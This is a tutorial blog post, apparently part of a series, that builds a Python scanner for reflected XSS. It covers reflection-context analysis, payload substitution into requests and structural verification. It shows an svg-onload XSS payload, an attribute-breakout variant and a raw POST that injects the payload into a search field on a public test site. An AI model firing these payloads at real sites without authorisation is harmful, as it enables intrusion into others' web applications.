Writing a scanner to find reflected XSS vulnerabilities — Part 2

pip3 install lxml

    # Parse the response with lxml and ask, with XPath, whether the probe
    # string appears inside a text node (between tags, not in an attribute).
    from lxml import html

    string = "<html><body><h1>teyascan</h1></body></html>"
    search_string = "teyascan"
    page_html_tree = html.fromstring(string)
    xpath = "//*[contains(text(),'" + search_string + "')]"
    n = page_html_tree.xpath(xpath)
    if len(n):
        print("INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT")
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'payload': 'teyascan', 'contexts': [{'type': 'text', 'count': 1}]}
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>
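The context analyzer above decides which payloads are worth sending, so it has to tell a text-node reflection apart from one inside an attribute value, a script block or a comment. Here is an added example of that classification (my code, not the post's ContextAnalyzer). It uses the standard library's HTMLParser instead of lxml so it runs without any extra package, returns the same {'type': ..., 'count': ...} shape the post prints, and for attribute reflections also records the tag, the attribute name and which quote character wraps the value, since that is what a breakout payload needs. The attribute/script/comment context names, make_probe() and the sample response are my additions.

```python
import re
import secrets
import string
from collections import Counter
from html.parser import HTMLParser


def make_probe(length=8):
    """A random alphanumeric marker (added helper): unlikely to occur naturally
    in the page and untouched by HTML encoding, so a missing reflection means
    the input was filtered, not encoded."""
    alphabet = string.ascii_lowercase + string.digits
    return "teya" + "".join(secrets.choice(alphabet) for _ in range(length))


class _ContextFinder(HTMLParser):
    """Record the syntactic context of every occurrence of `probe`."""

    def __init__(self, probe):
        # convert_charrefs=False keeps &lt; as an entity instead of '<',
        # so an encoded reflection is never mistaken for real markup.
        super().__init__(convert_charrefs=False)
        self.probe = probe
        self.in_script = False
        self.hits = []  # one (type, tag, attr, quote) tuple per occurrence

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        raw = self.get_starttag_text()
        for name, value in attrs:
            if value and self.probe in value:
                # Which quote wraps the value decides the breakout payload.
                m = re.search(re.escape(name) + r"""\s*=\s*(["']?)""", raw, re.I)
                quote = m.group(1) if m else ""
                self.hits.append(("attribute", tag, name, quote))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.probe in data:
            self.hits.append(("script" if self.in_script else "text", None, None, None))

    def handle_comment(self, data):
        if self.probe in data:
            self.hits.append(("comment", None, None, None))


def get_contexts(page, probe):
    """Same shape as the post's ContextAnalyzer output: a list of
    {'type': ..., 'count': ...} dicts, plus tag/attr/quote for attributes."""
    finder = _ContextFinder(probe)
    finder.feed(page)
    finder.close()
    contexts = []
    for (ctype, tag, attr, quote), n in Counter(finder.hits).items():
        ctx = {"type": ctype, "count": n}
        if ctype == "attribute":
            ctx.update(tag=tag, attr=attr, quote=quote)
        contexts.append(ctx)
    return {"payload": probe, "contexts": contexts}


# Constructed response (not a real target): the probe lands in five contexts.
SAMPLE_RESPONSE = """<html><body>
<!-- last query: teyascan -->
<h1>Results for teyascan</h1>
<input type="text" name="searchFor" value="teyascan">
<a href='/search.php?q=teyascan'>search again</a>
<script>var q = "teyascan";</script>
</body></html>"""

if __name__ == "__main__":
    for ctx in get_contexts(SAMPLE_RESPONSE, "teyascan")["contexts"]:
        print(ctx)
```

Running it on the constructed page prints one entry per context in document order: comment, text, the double-quoted value attribute on input, the single-quoted href on a, and script. A scanner that only knew "text" would miss the last four, and the quote character is what tells the payload generator whether to start with `">` or `'>`.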
    # RequestParser, GetInsertionPoints, send_request, ContextAnalyzer and
    # payload_generator are the pieces built earlier in this series.
    with open("requests.txt", "rb") as f:
        parser = RequestParser(f.read())
    i_p = GetInsertionPoints(parser.request)

    for request in i_p.requests:
        response = send_request(request, "http")
        if "teyascan" in response.text:
            print("probe reflection found in " + request.insertion)
            # Where in the HTML did the probe land? One payload set per context.
            contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
            final_payloads = []
            for context in contexts["contexts"]:
                print(context)
                payloads = payload_generator(context['type'])
                final_payloads.extend(payloads)
            print(final_payloads)
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'type': 'htmltag', 'count': 1}
[{'payload': '<svg onload=prompt`812132`>', 'find': '//svg[@onload[contains(.,812132)]]'}]
    dup = copy.deepcopy(request)

    # Method on the request object. str.replace() returns a new string and
    # leaves the original untouched, so every result has to be stored back;
    # the header dict is rebuilt because its keys are immutable.
    def replace(self, string, payload):
        self.headers = {k.replace(string, payload): v.replace(string, payload)
                        for k, v in self.headers.items()}
        for k in self.params:
            self.params[k] = self.params[k].replace(string, payload)
        for k in self.data:
            self.data[k] = self.data[k].replace(string, payload)
    import copy
    from lxml import html

    with open("requests.txt", "rb") as f:
        parser = RequestParser(f.read())
    i_p = GetInsertionPoints(parser.request)

    for request in i_p.requests:
        response = send_request(request, "http")
        if "teyascan" in response.text:
            print("probe reflection found in " + request.insertion)
            contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
            for context in contexts["contexts"]:
                print(context)
                payloads = payloadGenerator(context['type'])
                for payload in payloads:
                    # Work on a copy so the probe request survives for the
                    # next payload.
                    dup = copy.deepcopy(request)
                    dup.replace("teyascan", payload['payload'])
                    response = send_request(dup, "http")
                    # Structural check: the payload's own XPath ('find') must
                    # match the parsed response; a substring match would also
                    # fire on an HTML-escaped reflection.
                    page_html_tree = html.fromstring(response.text)
                    count = page_html_tree.xpath(payload['find'])
                    if len(count):
                        print("VULNERABLE TO XSS")
                        print(dup.headers)
                        http = MakeRawHTTP(dup)
                        print(http.rawRequest)
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
VULNERABLE TO XSS
POST /search.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://testphp.vulnweb.com
Connection: close
Referer: http://testphp.vulnweb.com/search.php?test=query
Upgrade-Insecure-Requests: 1
searchFor=asdas <svg onload=prompt`812132`>&goButton=go&
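The part of that loop worth getting right is the last step: confirming that the payload was parsed as markup rather than merely echoed. Below is an added, self-contained version of the payload-and-verify stage (my code, not the post's payloadGenerator, replace() or MakeRawHTTP) using the standard library's HTMLParser in place of lxml's XPath. The 'find' entry of each payload is a (tag, attribute) pair that must contain the marker after parsing. Two constructed stand-ins for the target replace send_request(): one reflects the searchFor value raw, the other passes it through html.escape(). The Request class, PAYLOADS table, scan() signature and sample request are assumptions of this example.

```python
import copy
import html
from dataclasses import dataclass, field
from html.parser import HTMLParser

MARKER = "812132"  # the number the post puts inside prompt`...`

# One payload per context type, paired with the structural check that proves
# it was parsed as markup: the (tag, attribute) that must contain MARKER.
# 'htmltag' is the name the post's output uses for the text context.
PAYLOADS = {
    "text": [{"payload": f"<svg onload=prompt`{MARKER}`>", "find": ("svg", "onload")}],
    "attribute": [{"payload": f'"><svg onload=prompt`{MARKER}`>', "find": ("svg", "onload")}],
}
PAYLOADS["htmltag"] = PAYLOADS["text"]


@dataclass
class Request:
    """Assumed request model: what the post's RequestParser produces."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)
    data: dict = field(default_factory=dict)
    insertion: str = ""

    def replace(self, string, payload):
        """Deep-copy, then swap `string` for `payload` in headers, params and
        body. str.replace() returns a new string, so every result is stored."""
        dup = copy.deepcopy(self)
        dup.headers = {k.replace(string, payload): v.replace(string, payload)
                       for k, v in self.headers.items()}
        dup.params = {k: v.replace(string, payload) for k, v in self.params.items()}
        dup.data = {k: v.replace(string, payload) for k, v in self.data.items()}
        return dup


class _TagFinder(HTMLParser):
    """Count <tag> elements whose `attr` value contains `marker`."""

    def __init__(self, tag, attr, marker):
        super().__init__()
        self.tag, self.attr, self.marker = tag, attr, marker
        self.found = 0

    def handle_starttag(self, tag, attrs):
        if tag == self.tag:
            for name, value in attrs:
                if name == self.attr and value and self.marker in value:
                    self.found += 1


def payload_executes(page, find, marker=MARKER):
    """True only if a browser-style parse yields the injected element; a plain
    substring test would also match an HTML-escaped reflection."""
    finder = _TagFinder(find[0], find[1], marker)
    finder.feed(page)
    finder.close()
    return finder.found > 0


def scan(request, send, context_types=("text",), probe="teyascan"):
    """The post's loop: confirm the probe reflects, then send one copy of the
    request per context payload and verify each response structurally.
    `send(request) -> str` stands in for send_request(request, "http")."""
    findings = []
    if probe not in send(request):
        return findings
    for ctype in context_types:
        for p in PAYLOADS.get(ctype, []):
            if payload_executes(send(request.replace(probe, p["payload"])), p["find"]):
                findings.append({"insertion": request.insertion, "payload": p["payload"]})
    return findings


# Constructed stand-ins for the target: the same page, reflected raw and
# reflected through html.escape().
SEARCH_PAGE = "<html><body><h1>searched for {q}</h1><input name='searchFor' value='{q}'></body></html>"

def vulnerable_server(req):
    return SEARCH_PAGE.format(q=req.data.get("searchFor", ""))

def hardened_server(req):
    return SEARCH_PAGE.format(q=html.escape(req.data.get("searchFor", ""), quote=True))


# Constructed request modelled on the post's POST to /search.php.
REQ = Request("POST", "/search.php",
              headers={"Host": "testphp.vulnweb.com"},
              data={"searchFor": "asdas teyascan", "goButton": "go"},
              insertion="searchFor")

if __name__ == "__main__":
    print(scan(REQ, vulnerable_server))  # one finding for searchFor
    print(scan(REQ, hardened_server))    # [] : marker present, but no <svg> element
```

The hardened page still contains the string 812132, so a scanner that checked `"812132" in response.text` would report it as vulnerable; payload_executes() only fires when the parser actually produces an svg element with an onload attribute, which is exactly what the XPath `//svg[@onload[contains(.,812132)]]` in the post asserts.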

TADAAA! We have successfully automated finding reflected XSS.

  • Scraping URLs from Wayback and scanning for XSS
  • Scraping Google with dorks and scanning for XSS

Hungrysoul: Python Dev, Part time Bug Bounty Hunter & a Full time entrepreneur.